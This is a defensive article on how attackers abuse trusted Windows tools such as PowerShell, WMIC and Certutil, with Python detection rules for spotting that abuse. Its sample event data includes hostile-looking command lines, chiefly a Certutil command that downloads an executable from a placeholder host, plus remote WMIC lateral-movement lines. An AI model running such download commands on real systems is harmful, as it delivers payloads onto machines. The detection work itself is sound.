Quick Facts
- Category: Cybersecurity
- Published: 2026-05-17 04:43:26
Imagine watching your own trusted IT utilities—PowerShell, WMIC, Certutil, and others—for 45 straight days. What you’d see isn’t just routine administration; it’s a mirror into the very tactics attackers use. Inspired by Bitdefender’s analysis and the concept that “your biggest security risk isn’t malware—it’s what you already trust,” this listicle distills the hard-won lessons from that observation. Each truth reveals how everyday tools become attack vectors, and how understanding them can shrink your real attack surface.
1. PowerShell Is the Most Abused Tool—Period
PowerShell is the Swiss Army knife for both sysadmins and attackers. During the 45-day watch, it appeared in nearly every suspicious session. Why? It’s built into Windows, deeply trusted, and capable of executing commands, scripts, and even downloading payloads. Attackers use it to run obfuscated scripts in memory, leaving minimal disk artifacts. The reality: if you’re not closely monitoring PowerShell usage, you’re blind to a huge chunk of post-exploitation activity.

2. Legitimate Admin Traffic and Attacks Look Identical
One of the most jarring discoveries was how often real administration and malicious activity shared the same command lines. A sysadmin running a quick WMI query to check disk space and an attacker using WMI to move laterally—both look like “normal” operations. This means traditional signature-based detection fails. The only way to tell them apart is through behavioral context: timing, frequency, and the users or accounts involved. Without that context, you’ll either miss attacks or drown in false positives.
3. WMIC Is the Lateral Movement King
WMIC (Windows Management Instrumentation Command-line) is a favorite for attackers who want to hop from one machine to another. During the observation period, WMIC connections often preceded data exfiltration or ransomware deployment. Unlike more exotic tools, WMIC is pre-installed and rarely flagged. The lesson: any use of WMIC across network boundaries deserves scrutiny. Implement alerts for WMI queries to remote systems, especially from non-admin accounts or outside normal hours.
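The remote-WMIC check described above, written as an added example in Python rather than taken from the article or from Bitdefender’s tooling. It assumes process-creation events with host, user, image and command-line fields (the sample events below are constructed), extracts the hosts named by WMIC’s /node: switch, and raises a higher-severity finding when the account is not on an admin allowlist (also constructed).

```python
import re

# Constructed process-creation events (fields modelled on Sysmon Event ID 1); not from the article.
SAMPLE_EVENTS = [
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic logicaldisk get size,freespace"},                      # local query
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic /node:FS-01 os get caption"},                           # remote, non-admin
    {"host": "WS-042", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic /node:localhost cpu get name"},                         # alias for local host
    {"host": "ADMIN-01", "user": r"CORP\it-ops", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:"WS-100","WS-101" /user:CORP\\it-ops os get caption'},  # remote, admin
    {"host": "ADMIN-01", "user": r"CORP\it-ops", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},                                            # not WMIC at all
]

ADMIN_ACCOUNTS = {r"corp\it-ops"}  # constructed allowlist of identities expected to manage remote hosts
LOCAL_ALIASES = {"LOCALHOST", "127.0.0.1", "::1", "."}
NODE_RE = re.compile(r"/node:(\S+)", re.IGNORECASE)


def remote_nodes(cmdline):
    """Return the hosts named by /node: switches, upper-cased.

    WMIC accepts a single name or a quoted, comma-separated list. A value of the
    form @file reads hosts from a file; it is returned as-is so the caller can
    still treat it as an unresolved remote target.
    """
    nodes = []
    for m in NODE_RE.finditer(cmdline):
        for raw in m.group(1).split(","):
            name = raw.strip().strip('"').strip("'")
            if name:
                nodes.append(name.upper())
    return nodes


def cross_host_wmic(events, admin_accounts=ADMIN_ACCOUNTS):
    """Flag WMIC invocations whose /node: targets are not the originating host."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("\\wmic.exe"):
            continue
        targets = [n for n in remote_nodes(ev["cmdline"])
                   if n not in LOCAL_ALIASES and n != ev["host"].upper()]
        if not targets:
            continue
        findings.append({
            "host": ev["host"],
            "user": ev["user"],
            "targets": targets,
            # Remote management from a non-admin identity is the case the article singles out.
            "severity": "medium" if ev["user"].lower() in admin_accounts else "high",
        })
    return findings


if __name__ == "__main__":
    for f in cross_host_wmic(SAMPLE_EVENTS):
        print(f)
```

The command line only shows targets passed on the command line; WMI connections made through the COM API or from PowerShell never pass through wmic.exe, so pair this rule with network telemetry for DCOM/WinRM traffic rather than relying on it alone.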
4. Certutil Does More Than Manage Certificates
Certutil is a legitimate tool for certificate services, but attackers have repurposed it as a downloader. In the 45-day window, multiple incidents showed Certutil being used to fetch executable files from remote servers. Because Certutil is signed by Microsoft, it often bypasses application whitelisting and even some AV. The takeaway: treat any outbound HTTP/HTTPS call from Certutil as suspect. Better yet, restrict its use to only certificate-related tasks via policy or AppLocker rules.
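A detection for the Certutil behaviour just described, added here as an example; it is not the article’s or Bitdefender’s code. It assumes the same process-creation event shape as above (constructed sample events), treats any URL on a certutil.exe command line as suspect, and rates the finding higher when the output path has an executable extension. AppLocker or policy restrictions are the preventive half and are not shown.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".scr", ".msi")

# Constructed process-creation events; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"host": "WS-042", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f https://files.example.invalid/update.exe C:\Users\Public\update.exe"},
    {"host": "PKI-01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify -urlfetch C:\certs\server.cer"},          # URL comes from the cert, not argv
    {"host": "PKI-01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -f http://crl.example.invalid/ca.crl C:\certs\ca.crl"},  # legitimate CRL fetch
    {"host": "WS-042", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c echo hi"},
]


def certutil_network_findings(events):
    """Return one finding per certutil.exe invocation that names an HTTP(S) URL.

    Per the article's guidance every such call is suspect; executable output
    paths are rated 'high', anything else (CRLs, certificates) 'medium' so the
    PKI team's routine fetches can be triaged instead of ignored.
    """
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("\\certutil.exe"):
            continue
        urls = URL_RE.findall(ev["cmdline"])
        if not urls:
            # Caveat: -urlfetch/-verify retrieve URLs taken from the certificate itself,
            # so command-line inspection misses them; network telemetry is still needed.
            continue
        dest = ev["cmdline"].split()[-1]
        dest_is_url = URL_RE.match(dest) is not None
        executable = (not dest_is_url) and dest.lower().endswith(EXEC_EXT)
        findings.append({
            "host": ev["host"],
            "remote_hosts": sorted({urlparse(u).hostname for u in urls}),
            "destination": None if dest_is_url else dest,
            "severity": "high" if executable else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in certutil_network_findings(SAMPLE_EVENTS):
        print(f)
```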
5. MSBuild Compiles Code Right Under Your Nose
MSBuild, the build engine for .NET, is another trusted tool turned weapon. Attackers use it to compile and execute C# code on the fly—often without writing anything to disk. This technique, called “living off the land,” allows them to run custom payloads while looking like a developer’s build process. Monitoring MSBuild invocation (especially with arguments pointing to suspicious XML files) is critical. In the 45-day study, it was the third most common abuse vector behind PowerShell and WMI.
6. Netsh Reveals Network Reconnaissance Patterns
Netsh is used for network configuration, but attackers leverage it for reconnaissance—enumerating firewall rules, routing tables, and open ports. During the monitoring, any netsh or netstat command that queried firewall policies or port status was a red flag. Combine this with short time intervals between commands and you have a classic recon pattern. The key is to baseline normal netsh and netstat use in your environment; any deviation should trigger investigation.

7. Logging Is Only Half the Battle
Many organizations have logging in place, but the 45-day experiment showed that logs alone don’t stop attacks. The real challenge is correlating events across hundreds of tools and thousands of machines. For example, a PowerShell script execution log paired with a Certutil download log from the same host at the same time is a strong indicator of compromise. Without proper correlation, you’re just storing data, not gaining insight. Invest in SIEM or UEBA to make your logs actionable.
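The PowerShell-plus-Certutil correlation the paragraph uses as its example, implemented as an added Python example rather than any SIEM product’s rule language. It assumes both log sources have been normalized to events with a timestamp, host, tool name and command line (the sample events are constructed) and joins them on host within a five-minute window, in either order.

```python
import re
from datetime import datetime, timedelta

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed events already normalized from two sources (PowerShell execution logs and
# certutil process logs); not from the article. Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"ts": "2026-05-10T09:01:10", "host": "WS-042", "tool": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\Public\stage.ps1"},
    {"ts": "2026-05-10T09:02:05", "host": "WS-042", "tool": "certutil.exe",
     "cmdline": r"certutil -urlcache -f https://files.example.invalid/u.bin C:\Users\Public\u.bin"},
    {"ts": "2026-05-10T10:30:00", "host": "PKI-01", "tool": "certutil.exe",
     "cmdline": r"certutil -urlcache -f http://crl.example.invalid/ca.crl C:\certs\ca.crl"},  # no PowerShell nearby
    {"ts": "2026-05-10T13:58:00", "host": "WS-007", "tool": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ts": "2026-05-10T14:20:00", "host": "WS-007", "tool": "certutil.exe",
     "cmdline": r"certutil -urlcache -f https://files.example.invalid/x.bin C:\Temp\x.bin"},  # 22 min later: outside window
]


def parse_ts(value):
    return datetime.fromisoformat(value)


def correlate_powershell_certutil(events, window=timedelta(minutes=5)):
    """Pair each certutil command line containing a URL with PowerShell executions on the same host
    that fall within `window` before or after it. Returns one hit per matching pair."""
    powershell = [e for e in events if e["tool"].lower() == "powershell.exe"]
    certutil = [e for e in events
                if e["tool"].lower() == "certutil.exe" and URL_RE.search(e["cmdline"])]
    hits = []
    for c in certutil:
        c_ts = parse_ts(c["ts"])
        for p in powershell:
            if p["host"] != c["host"]:
                continue
            gap = abs(c_ts - parse_ts(p["ts"]))
            if gap <= window:
                hits.append({"host": c["host"], "powershell_ts": p["ts"], "certutil_ts": c["ts"],
                             "gap_seconds": int(gap.total_seconds())})
    return hits


if __name__ == "__main__":
    for hit in correlate_powershell_certutil(SAMPLE_EVENTS):
        print(hit)
```

Each source on its own produces a medium-confidence signal; the join is what turns two routine-looking log lines into an indicator worth paging on. Tune the window to your environment: too wide and the PKI host’s CRL refreshes start colliding with unrelated scripts, too narrow and a slow stager slips through.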
8. False Positives Are the Silent Killer of Security Teams
During the observation, the team faced a flood of alerts—most were false positives from legitimate admin tasks. The result? Fatigue and missed real threats. The culprit was overly broad detection rules that flagged any use of built-in tools. The solution is to tune detections based on your organization’s specific baseline. For instance, if IT regularly runs WMI queries on Fridays, don’t alert on that—instead, alert on WMI from non-IT workstations or at unusual hours.
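The baseline-driven tuning described in this item and in item 2 (behavioral context: timing, frequency, accounts), as one added Python example that is not the article’s or Bitdefender’s code. It learns, from a constructed window of known-good events, which hosts, weekdays and hours each (tool, user) pair normally uses, then suppresses new events that fit and explains why the rest deviate. The sample history and new events are constructed.

```python
from collections import defaultdict
from datetime import datetime

# Constructed known-good history: CORP\it-ops runs WMIC from ADMIN-01 on Friday mornings.
BASELINE_EVENTS = [
    {"ts": "2026-05-01T09:10:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "ADMIN-01"},
    {"ts": "2026-05-01T10:45:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "ADMIN-01"},
    {"ts": "2026-05-08T09:30:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "ADMIN-01"},
]

# Constructed events from the next week; only the first matches the baseline.
NEW_EVENTS = [
    {"ts": "2026-05-15T10:00:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "ADMIN-01"},  # Friday, 10:00
    {"ts": "2026-05-15T02:00:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "ADMIN-01"},  # unusual hour
    {"ts": "2026-05-15T10:00:00", "tool": "wmic.exe", "user": r"CORP\jdoe",   "host": "WS-042"},    # no history at all
    {"ts": "2026-05-15T10:00:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "WS-042"},    # non-IT workstation
    {"ts": "2026-05-12T10:00:00", "tool": "wmic.exe", "user": r"CORP\it-ops", "host": "ADMIN-01"},  # Tuesday
]


def build_baseline(events):
    """Map (tool, user) -> the hosts, weekdays and hours seen during the learning window."""
    baseline = defaultdict(lambda: {"hosts": set(), "weekdays": set(), "hours": set()})
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        entry = baseline[(e["tool"].lower(), e["user"].lower())]
        entry["hosts"].add(e["host"].upper())
        entry["weekdays"].add(ts.weekday())   # Monday=0 ... Sunday=6
        entry["hours"].add(ts.hour)
    return baseline


def deviations(event, baseline, hour_slack=1):
    """Return the list of ways `event` departs from baseline; an empty list means 'suppress'."""
    ts = datetime.fromisoformat(event["ts"])
    key = (event["tool"].lower(), event["user"].lower())
    if key not in baseline:
        return [f"no history of {event['user']} using {event['tool']}"]
    entry = baseline[key]
    reasons = []
    if event["host"].upper() not in entry["hosts"]:
        reasons.append(f"host {event['host']} not in baseline hosts")
    if ts.weekday() not in entry["weekdays"]:
        reasons.append(f"weekday {ts.strftime('%A')} not in baseline weekdays")
    low, high = min(entry["hours"]) - hour_slack, max(entry["hours"]) + hour_slack
    if not low <= ts.hour <= high:
        reasons.append(f"hour {ts.hour:02d}:00 outside baseline window {low:02d}-{high:02d}")
    return reasons


def tuned_alerts(events, baseline):
    """Only events that deviate from baseline become alerts, each carrying its reasons."""
    alerts = []
    for e in events:
        reasons = deviations(e, baseline)
        if reasons:
            alerts.append({"event": e, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    base = build_baseline(BASELINE_EVENTS)
    for alert in tuned_alerts(NEW_EVENTS, base):
        print(alert["event"]["ts"], alert["event"]["user"], alert["event"]["host"], alert["reasons"])
```

The learning window must itself be clean: if an intruder was active while the baseline was built, their activity becomes "normal". Re-learn periodically and review what the baseline contains, not just what it suppresses.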
9. Behavioral Analytics Beat Signature Matching
By day 30, it became clear that static signatures were useless. Attackers modify payloads with trivial obfuscation, but their behavior—like running multiple command-line tools sequentially from a single process—stays consistent. Behavioral analytics, such as monitoring for parent-child process relationships (e.g., Word launching PowerShell), caught far more real incidents. This approach also helps distinguish between a sysadmin running a script and an attacker doing the same thing, because the sequence and context differ.
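The two behavioral patterns named above (an Office application spawning a command-line tool, and several tools launched in sequence from a single process), implemented as an added Python example; this is not the article’s or Bitdefender’s detection logic. It assumes process-creation events carrying pid, parent pid and parent image (as Sysmon Event ID 1 does); the events are constructed, and pids are used as parent keys for brevity where real telemetry should use a process GUID because pids are reused.

```python
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "wmic.exe", "certutil.exe", "msbuild.exe",
           "netsh.exe", "mshta.exe", "rundll32.exe"}

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"

# Constructed process-creation events (Sysmon Event ID 1 style); not from the article.
SAMPLE_EVENTS = [
    {"ts": "2026-05-10T09:00:00", "host": "WS-042", "pid": 4100, "ppid": 3900,
     "image": WINWORD, "parent": r"C:\Windows\explorer.exe"},
    {"ts": "2026-05-10T09:00:12", "host": "WS-042", "pid": 4188, "ppid": 4100,
     "image": POWERSHELL, "parent": WINWORD},                            # Word -> PowerShell
    {"ts": "2026-05-10T09:00:20", "host": "WS-042", "pid": 4200, "ppid": 4188,
     "image": SYS32 + r"\certutil.exe", "parent": POWERSHELL},
    {"ts": "2026-05-10T09:00:35", "host": "WS-042", "pid": 4210, "ppid": 4188,
     "image": SYS32 + r"\wbem\WMIC.exe", "parent": POWERSHELL},
    {"ts": "2026-05-10T09:01:02", "host": "WS-042", "pid": 4220, "ppid": 4188,
     "image": SYS32 + r"\netsh.exe", "parent": POWERSHELL},              # three tools from one shell
    {"ts": "2026-05-10T10:00:00", "host": "ADMIN-01", "pid": 5000, "ppid": 700,
     "image": SYS32 + r"\cmd.exe", "parent": r"C:\Windows\explorer.exe"},  # admin opens a shell
    {"ts": "2026-05-10T10:00:30", "host": "ADMIN-01", "pid": 5010, "ppid": 5000,
     "image": SYS32 + r"\wbem\WMIC.exe", "parent": SYS32 + r"\cmd.exe"},   # runs one query: benign
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawn_findings(events):
    """Office application directly launching a command-line tool."""
    return [{"rule": "office-spawns-lolbin", "host": ev["host"], "pid": ev["pid"],
             "parent": basename(ev["parent"]), "child": basename(ev["image"])}
            for ev in events
            if basename(ev["parent"]) in OFFICE_APPS and basename(ev["image"]) in LOLBINS]


def tool_chain_findings(events, min_tools=3, window=timedelta(minutes=5)):
    """One parent launching at least `min_tools` distinct tools within `window`."""
    by_parent = defaultdict(list)
    for ev in events:
        if basename(ev["image"]) in LOLBINS:
            by_parent[(ev["host"], ev["ppid"])].append(
                (datetime.fromisoformat(ev["ts"]), basename(ev["image"])))
    findings = []
    for (host, ppid), children in by_parent.items():
        children.sort()
        for i, (start, _) in enumerate(children):
            tools = {name for ts, name in children[i:] if ts - start <= window}
            if len(tools) >= min_tools:
                findings.append({"rule": "sequential-lolbins", "host": host,
                                 "ppid": ppid, "tools": sorted(tools)})
                break  # one finding per parent is enough
    return findings


if __name__ == "__main__":
    for f in office_spawn_findings(SAMPLE_EVENTS) + tool_chain_findings(SAMPLE_EVENTS):
        print(f)
```

The sysadmin on ADMIN-01 and the Word-launched shell on WS-042 both ran WMIC; only the lineage and the sequence separate them, which is the point the paragraph makes about context.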
10. Reducing Privilege Is Your Most Effective Control
The final truth is simple but profound: the less trust you grant to these tools, the smaller your attack surface. During the 45 days, every incident traced back to over-privileged accounts or unrestricted tool access. Remove admin rights from standard users, restrict PowerShell to constrained language mode, and block Certutil outbound connections. Even partial implementation of these controls forced attackers to use noisier, riskier methods—making them easier to detect. Tool monitoring confirms that locking down trust is the foundation of defense.
Conclusion: The Mirror Doesn’t Lie
Watching your own tools for 45 days is like holding up a mirror to your organization’s security posture. It reveals that the very utilities you trust are the ones attackers exploit most. But it also gives you a roadmap: monitor behavior, baseline normal activity, reduce privileges, and correlate logs intelligently. The attack surface isn’t just your network perimeter—it’s every trusted tool running inside it. By understanding these ten truths, you can turn your tools from an attacker’s ally into your strongest defense.